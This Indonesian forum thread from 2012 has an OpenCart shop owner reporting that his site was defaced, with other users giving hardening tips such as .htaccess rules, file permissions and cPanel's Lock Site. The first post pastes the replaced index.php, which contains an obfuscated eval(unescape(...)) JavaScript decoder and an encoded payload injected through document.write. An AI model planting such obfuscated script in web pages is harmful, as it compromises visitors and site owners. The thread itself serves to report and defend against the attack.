Page 1 of 1

[ask] Cara Proteksi Opencart dari Deface atau Hack

Posted: Fri Nov 30, 2012 10:18 am
by sigue
Selamat pagi para opencarter, opencart mastah and webmastah, saya mau tanya tentang cara proteksi web opencart kita dari orang iseng yg melakukan deface atau hack.
soalnya baru kemarin saya mengalaminya, kejadiannya kemarin pagi pas saya buka web opencart saya, saya liat web saya tampilannya menjadi hanya berupa text saja dengan tulisan "OPENCART IS DOWN FOR MAINTENANCE!", tadinya saya pikir emang lg ada maintenance dari pihak server hostingannya, tapi pas siangnya saya cek lg masih jg gitu, trus saya cek subdomain sy yang pake opencart jg, ternyata normal2 saja ga ada masalah, trus saya liat2 di web forum tempat saya sewa hosting, dan cari domain2 yang sama sewa hosting di tempat itu jg, dan ternyata normal jg ga ada masalah.
disini saya mulai curiga, trus saya coba cek via FTP dan saya cek file 'index.php' dan ternyata emang udah berubah, saya gak tau itu filenya yg direplace atau kodenya yg di replace, jadi seperti ini nih script kodenya :
<head><title>Themes Opencart >> One Stop Shopping for Unique, Elegant and Affordable OpenCart Theme</title><base href="http://themesopencart.com/" /><meta name="description" content="We provide a variety of Opencart Templates with a variety of attractive design, elegant and affordable. " /><link href="http://themesopencart.com/image/data/cart.png" rel="icon" /><link rel="stylesheet" type="text/css" href="catalog/view/theme/octpl008/stylesheet/lightstyleblue.css" /><body><center><p><h1>Opencart is down for maintainence!</h1><p><script type="text/javascript"><!-- eval(unescape('%66%75%6e%63%74%69%6f%6e%20%6e%64%62%33%64%63%34%38%28%73%29%20%7b%0a%09%76%61%72%20%72%20%3d%20%22%22%3b%0a%09%76%61%72%20%74%6d%70%20%3d%20%73%2e%73%70%6c%69%74%28%22%31%38%39%32%33%37%31%31%22%29%3b%0a%09%73%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%30%5d%29%3b%0a%09%6b%20%3d%20%75%6e%65%73%63%61%70%65%28%74%6d%70%5b%31%5d%20%2b%20%22%36%34%38%32%30%30%22%29%3b%0a%09%66%6f%72%28%20%76%61%72%20%69%20%3d%20%30%3b%20%69%20%3c%20%73%2e%6c%65%6e%67%74%68%3b%20%69%2b%2b%29%20%7b%0a%09%09%72%20%2b%3d%20%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%28%70%61%72%73%65%49%6e%74%28%6b%2e%63%68%61%72%41%74%28%69%25%6b%2e%6c%65%6e%67%74%68%29%29%5e%73%2e%63%68%61%72%43%6f%64%65%41%74%28%69%29%29%2b%34%29%3b%0a%09%7d%0a%09%72%65%74%75%72%6e%20%72%3b%0a%7d%0a'));eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%6e%64%62%33%64%63%34%38%28%27') + '%3e%62%65%68%59%61%63%1a%6b%66%5d%39%1e%62%77%77%6a%32%23%29%62%6f%64%2c%2a%64%6d%6b%77%6d%2e%63%6c%65%2f%55%68%5d%68%73%77%62%59%6b%23%63%72%5b%69%6e%70%2b%76%76%69%6c%2d%69%68%65%61%62%63%61%6e%5d%58%63%5b%6a%6b%63%69%5f%6b%69%70%2a%6a%63%6b%18%18%7b%67%66%74%6c%3b%2e%1c%62%66%62%65%60%78%3b%36%18%67%72%75%68%67%3e%19%74%61%67%67%58%61%60%67%70%75%30%1b%63%63%64%68%63%6c%1a%32%3a%2b%65%64%69%5a%6f%65%3218923711%36%37%37%36%34%38%32' + unescape('%27%29%29%3b'));// --></script></center></body></html>
so, utk para mastah kiranya tau bagaimana cara memproteksi website opencart kita terhadap deface atau hack???
dan satu lg pertanyaan saya saat ini saya ubah file permission untuk file 'index.php' menjadi 444 untuk mencoba proteksi apakah itu ga apa-apa?? Thanks. ;) ;)

Re: [ask] Cara Proteksi Opencart dari Deface atau Hack

Posted: Fri Dec 07, 2012 5:40 pm
by faisalsani
Coba ke Cara mengamankan toko online opencart mungkin sedikit bisa membantu gan ;-)

Re: [ask] Cara Proteksi Opencart dari Deface atau Hack

Posted: Sat Dec 08, 2012 8:48 am
by sigue
sip, thanks atas infonya gan, ntar sy mo coba yg proteksi dgn .htaccess-nya :)

Re: [ask] Cara Proteksi Opencart dari Deface atau Hack

Posted: Mon Dec 10, 2012 9:10 am
by Si Doel
faisalsani wrote:Coba ke Cara mengamankan toko online opencart mungkin sedikit bisa membantu gan ;-)
mantaaffff,,,, :P :P :P

Re: [ask] Cara Proteksi Opencart dari Deface atau Hack

Posted: Wed Dec 12, 2012 10:58 pm
by zaini
widih ngeri jg ya kLo kena kek gtu.
Apalagi kLo tokonya dah rame, pasti bakal panic mode on

Re: [ask] Cara Proteksi Opencart dari Deface atau Hack

Posted: Sat Dec 29, 2012 3:25 pm
by Si Doel
tambahan:
Powered by Opencart di ganti ,biar ga seenaknya orang upload gambar ke web kita ;D

Re: [ask] Cara Proteksi Opencart dari Deface atau Hack

Posted: Mon Dec 31, 2012 7:42 pm
by jurpro
Untuk sebagian hosting yang menggunakan CPanel versi terbaru, sekarang sudah ada fasilitas "LOCK SITE" dimana fungsinya adalah mengunci seluruh file dari tangan-tangan jahil. Namun fungsi ini juga menjadikan FTP service dan aktivitas upload file ke server tidak bisa digunakan. Jadi, jika akan mengupload atau memodifikasi file di server silahkan "DISABLE" dulu fungsi Lock Site nya. Namun jika sudah selesai mengedit atau upload file, kamu tinggal mengaktifkan lagi "ENABLE" fungsi LOCK SITE nya.

Re: [ask] Cara Proteksi Opencart dari Deface atau Hack

Posted: Tue Jan 01, 2013 11:58 pm
by jurpro
Ternyata fungsi "LOCK SITE" pada CPnael versi terbaru ini membawa masalah karena fitur baru dan sistem Ecommerce ini bukan sistem blog news, seperti Wordpress atau Joomla. Ini situs yang memungkinkan pelanggan menambahkan data, menulis pemesanan, dll... Semua sistem itu dimatikan oleh fungsi "Lock Site"... So... Mentah lagi, dan gue pun mematikan lagi fungsi ini menjadi DISABLE.

Re: [ask] Cara Proteksi Opencart dari Deface atau Hack

Posted: Sat Jan 05, 2013 6:41 pm
by Si Doel
jurpro wrote:Ternyata fungsi "LOCK SITE" pada CPnael versi terbaru ini membawa masalah karena fitur baru dan sistem Ecommerce ini bukan sistem blog news, seperti Wordpress atau Joomla. Ini situs yang memungkinkan pelanggan menambahkan data, menulis pemesanan, dll... Semua sistem itu dimatikan oleh fungsi "Lock Site"... So... Mentah lagi, dan gue pun mematikan lagi fungsi ini menjadi DISABLE.
hmmm,,,bolak balik,capee deh ;D ;D :crazy: